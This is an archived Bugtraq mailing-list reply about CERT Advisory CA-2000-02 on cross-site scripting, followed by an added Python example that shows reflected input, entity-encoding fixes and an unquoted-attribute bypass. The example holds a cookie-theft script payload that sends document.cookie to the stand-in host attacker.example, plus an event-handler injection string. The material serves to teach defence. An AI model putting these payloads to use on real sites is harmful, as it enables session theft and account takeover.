Bugtraq mailing list archives

Re: Fwd: CERT Advisory CA-2000-02


From: marcs () ZNEP COM (Marc Slemko)
Date: Thu, 3 Feb 2000 14:29:23 -0700


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 3 Feb 2000 Shockro () AOL COM wrote:

> I'm curious as to how this could be used in a malicious manner, as opposed to
> just being an annoyance.  I mean, god forbid, people should execute arbitrary
> javascript on us.  Yes, we've all seen the file upload form exploit and the
> 1001 ways to crash Internet Explorer through infinite loops, but there's
> nothing seriously harmful about this, am I right?  Please correct me if I'm
> wrong.

You are completely wrong.

Please go through the full text of the CERT advisory, and the info
in the Apache and (in particular) Microsoft web sites.

This is a problem because it breaks some of the site-specific barriers.
A very simple example is that this could be used to steal someone's cookie,
which may be what is used to authenticate them.

The problem is a very broad one, however, with a huge number of specific
instances, most of which have probably not been discovered.  It also
goes beyond just javascript, since javascript is not necessary to
exploit this in certain ways.

Again, this is not a javascript problem.  This is also not just the same
old "if user B submits something to a site that is then shown to
user A, you have to filter or encode it" problem.  This is "if user
A submits something to a site that is sent back unfiltered and unencoded
to user A, then you have a security problem".  Yes, this is a new
issue.  Well, the components of it are (mostly) nothing new, but putting
them together is.

Also note that filtering or encoding things is not as easy as you may
think.  There are far too many very annoying things, including character set
issues and browser-specific extensions.

- From my brief survey last week, most of the top commerce sites are
vulnerable to some degree (whether it can be exploited to any dangerous effect,
however, is another issue) and most webserver products are vulnerable
themselves; Apache's vulnerabilities are among the less serious compared
to a number of other products.  Even some products where the vendor has
released a statement saying "no problems" have obvious problems.  Don't
start thinking this is just a vendor problem though; the real issue with
this problem is that fixing it requires that a site fix all of its locally
created dynamic content.

- --
     Marc Slemko     | Apache Software Foundation member
     marcs () znep com  | marc () apache org

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOJnzNVQv/g4Arev1AQE2VwP+Npc1Aa9tmyb/4KbjyxCFn879h7bCLZkq
WblwHPocOuW1oiS38ejdqf6V4nn4qSUXjzmhwRK8ZsC15v9dVE3ZaEfwh4Rkd6JK
VpgRdbgI6KcTkWI7ceNNWbu4AsE5t3MJ08RQD9bwr+C6MVj6zby3gyNtNbt16Itl
+0hcVca/F8Y=
=78Oq
-----END PGP SIGNATURE-----
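The pattern Marc describes ("user A submits something that is sent back unfiltered and unencoded to user A") and his warning that encoding is harder than it looks, as an added example that is not part of the original message or of the CERT advisory. The hostnames (shop.example, attacker.example) and the payloads are constructed for illustration; the parser-based checks stand in for what a browser would do with the reflected output.

```python
"""Reflected input echoed back to the same user (the CA-2000-02 pattern),
the entity-encoding fix, and one context where that fix alone is not enough."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlparse

# Constructed attacker payload: ships the victim's cookie (often the session
# credential) to a host the attacker controls. attacker.example is hypothetical.
COOKIE_THEFT = ("<script>document.location='http://attacker.example/c?'"
                "+document.cookie</script>")

# Constructed payload for an unquoted attribute: no angle brackets, no quotes.
ATTR_PAYLOAD = "x onmouseover=alert(document.cookie)"


def malicious_link(search_url: str, payload: str) -> str:
    """Link the attacker gets the victim to click; the payload rides in ?q=."""
    return search_url + "?q=" + quote(payload)


def query_from_url(url: str) -> str:
    """What the server's search handler sees as the 'q' parameter."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def search_page_vulnerable(query: str) -> str:
    """The bug: the user's own input is echoed straight into the page body."""
    return f"<html><body><h1>Results for {query}</h1></body></html>"


def search_page_encoded(query: str) -> str:
    """Fix for body context: & < > \" ' become entities, so the input can
    only render as text, never as markup."""
    return f"<html><body><h1>Results for {html.escape(query, quote=True)}</h1></body></html>"


def prefill_unquoted_attr(value: str) -> str:
    """Still exploitable despite html.escape(): in an unquoted attribute a
    space ends the value and the remainder becomes a new attribute."""
    return f'<input name="q" value={html.escape(value, quote=True)}>'


def prefill_quoted_attr(value: str) -> str:
    """Attribute-context fix: always quote the value AND encode quotes in it."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records whether a real <script> start tag appears and what attributes
    the <input> tag ends up with, i.e. how a browser would read the markup."""

    def __init__(self):
        super().__init__()
        self.saw_script = False
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.saw_script = True
        elif tag == "input":
            self.input_attrs = dict(attrs)


def _parse(fragment: str) -> _TagCollector:
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector


def reflects_script(page: str) -> bool:
    """True if the response contains an executable <script> element."""
    return _parse(page).saw_script


def input_attributes(fragment: str) -> dict:
    """Attributes of the <input> tag as the HTML parser sees them."""
    return _parse(fragment).input_attrs


def injects_event_handler(fragment: str) -> bool:
    """True if the payload became its own on* event-handler attribute."""
    return any(name.startswith("on") for name in input_attributes(fragment))


if __name__ == "__main__":
    q = query_from_url(malicious_link("http://shop.example/search", COOKIE_THEFT))
    print("vulnerable page runs script:", reflects_script(search_page_vulnerable(q)))
    print("encoded page runs script:   ", reflects_script(search_page_encoded(q)))
    print("unquoted attr injected:     ", injects_event_handler(prefill_unquoted_attr(ATTR_PAYLOAD)))
    print("quoted attr injected:       ", injects_event_handler(prefill_quoted_attr(ATTR_PAYLOAD)))
```

The second half is the point about "filtering or encoding is not as easy as you may think": the same html.escape() call that neutralises the cookie-theft payload in body context does nothing against ATTR_PAYLOAD when the value lands in an unquoted attribute, because that payload never uses a character the encoder touches. The output context, not just the input, decides what encoding is sufficient.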

